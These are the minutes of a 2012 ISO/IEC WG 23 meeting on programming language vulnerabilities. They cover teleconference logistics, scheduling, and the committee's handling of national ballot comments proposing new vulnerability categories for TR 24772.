ISO/IEC JTC 1/SC 22/WG 23/N 0420
Minutes: Meeting #23
ISO/IEC JTC 1/SC 22/WG 23: Programming Language Vulnerabilities
12-14 September 2012


These minutes are not final until approved at a subsequent meeting.

Meeting Times:

20 June 2012: 09:00 am to 4:30 pm (Central European Time)
21 June 2012: 09:00 am to 4:30 pm (CET)
22 June 2012: 09:00 am to 12:00 pm (CET)

Meeting Location:

N 0374

Teleconference information:

Topic: WG 23 Meeting #23
Date: Every 1 day, from Wednesday, September 12, 2012 to Friday, September 14, 2012
Time:
9:00 am Germany
8:00 am United Kingdom
3:00 am New York
12:00 am California
9:00 pm (previous day), Hawaii
Meeting Number: 950 652 945
Meeting Password: wg23

To start or join the online meeting, go to iso_meetings

To receive a call back, provide your phone number when you join the meeting, or call the number below and enter the access code.

Switzerland toll free: 0800-894627
USA/Canada toll free: 1-855-299-5224

Having trouble dialing in? Try these backup numbers:
Call-in toll-free number (UK): 0800-051-3810
Call-in toll number (UK): +44-20-310-64804
Global call-in numbers: iso_meetings call-in numbers
Toll-free dialing restrictions: tollfree restrictions

Access code: 957 751 512
For assistance:

1. Go to iso_meetings support
2. On the left navigation bar, click "Support".
To add this meeting to your calendar program (for example Microsoft Outlook), click this link: iso_meetings to calendar

Agenda

1. Opening activities

1.1 Opening Comments

1.2 Introduction of Participants/Roll Call

1.3 Procedures for this Meeting

The convener mentioned that this is the first time that the committee has worked without it's secretary and web master James Moore. We will experiment with procedures as we progress.

1.4 Approval of previous Minutes

1.5 Review of actions items and resolutions, Action Item and Decision Logs

1.6 Approval of Agenda [N0414]

1.7 Information on Future Meetings

1.7.1 Future Meeting Schedule

2013

WG23 #28

2013-12

Electronic meeting

WG23 #27

2013-09

Tokyo, Japan

WG23 meeting colocated with SC22 plenary meeting.

WG23 #26

2013-06

Berlin, DE

Colocated with WG 9, Ada Europe

WG23 #25

2013-03-13/15

New York, USA - ANSI

See [N0413].

2012

WG23 #24

2012-12-12/14

Electronic meeting

WG23 Meeting #24. Three hours each day, starting at 17:00 Germany; 16:00 UK; 11:00 US-east coast; 8:00 US-west coast; 6:00 US-Hawaii

1.7.2 Future Agenda Items

None

2. Reports on Liaison Activities

2.1 SC 22

2.2 PL22.3/WG5 (Fortran)

2.3 PL22.4/WG4 (COBOL)

None

2.4 WG9 (Ada)

2.5 PL22.11/WG14 (C)

2.6 PL22.16/WG21 (C++)

None

2.7 Ecma International, TC49/TG2 (C#)

None

2.8 Ecma International, TC39 (ECMAScript)

2.9 MISRA (C)

2.10 MISRA (C++)

None

2.11 SPARK

None

2.12 SC7/WG19 (UML)

None

2.13 Other Liaison Activities or National body reports

3. Document Review

1. [N0416] – Informal comments from UK

Larry Wagoner comments [N0423] Python (as a response to UK comments [N0416])
Comment was line 50 on UK contribution.
Open, to be discussed with UK technical expert and original Python annex author.

2. [N0417] – Japan Ballot comments on 24772

We discuss JP-5 file download. Consider the option of merging this with 7.10 Unrestricted file upload. We are concerned about the size of the changes and and the amount of change that would be added to TR 24772.

Comments from Willem.

JP-6 Incorrect Authorization. - Needs to be added.
Larry might be able to merge into 7.21 Access Control.
JP-7 Inclusion of Functionality from untrusted control sphere.
Suggest merging with 7.7 Execution or loading of untrusted code.
David notes that PHP (and possibly other web-oriented language) does includes from other domains, and hence this may need description in section 6.

AI 23-4 David distribute information on the PHP include issue for education and consideration.
JP-8 Improper restriction of excessive authentication attempts should be added.
Larry states that it could be added to 7.22, but may be a stretch.
Editor points out this would require a rewrite of 7.22.
JP-9 URL redirection to untrusted site (open redirect)
Suggest add as a new vulnerability.
JP-10 Uncontrolled format string
Suggests that this is a language issue belongs in 6.
JP-11 Use of a one-way hash without salt.
Suggests that this belongs in 7.22. Title of 7.22 may need changing.

The editor suggests that we accept the comments, put the editorial ones into the TR and work on adding the other comments into the next revision.

The general consensus of the committee is that this is good work and a needed addition to the TR, but needs more review. A sub-group of Takebe, Pygott, and Benito was formed to get this work ready to include in the 3rd addition of the TR.

3. [N0418] – Canadian Ballot comments on 24772

Resolutions are documented in the [N0421].

4. [N0419] – Takebe, CWE SANS 25 compared to PDTR 24772.2

5. [N0420] – Reserved for minutes

6. [N0421] – Reserved for ballot resolutions

7. [N0422] – Comments from Clive Pygott regarding [N0417]

4. Other Business

4.1Temporary web site.

For the duration of the meeting we shall use the temporary web site set up at www.open-std.org/jtc1/sc22/wg23.

Thanks to Keld Simonsen and Willem Wakker for providing this facility.

If you follow the link from the SC 22 page on www.open-std.org/jtc1/sc22 it takes you to the usual ieee web page.

4.2 Code Signing IS 17960

Current proposed of the document (still in author's hands) is fairly prescriptive in terms of file formats,etc. Concern expressed that developers of applications will not meet such an approach. Suggestion made that the actual way to interface would be implementation-defined, meaning that it must be documented.

4.3 Promotion of WG23 Products, Steve Michell, per Action Item #21-6

Promotion by speaking at events Ada Europe, Ruby conference.
Presentation to functional safety and security experts (Japan).

Idea to ask CWE to put a reference to our document on the related efforts.

AI 23-5 John Benito to contact CWE to discuss inclusion of TR 24772 in CWE, CVE, etc in the related efforts pages.

5. Resolutions

Editor to incorporate the changes into the document and disposition of comments and submit to ITTF for a 3-month DTR ballot.
Thanks to IEC international, and Gabriel Barta and Jennifer Lack for their help in arranging and supporting the meeting.

6. Adjournment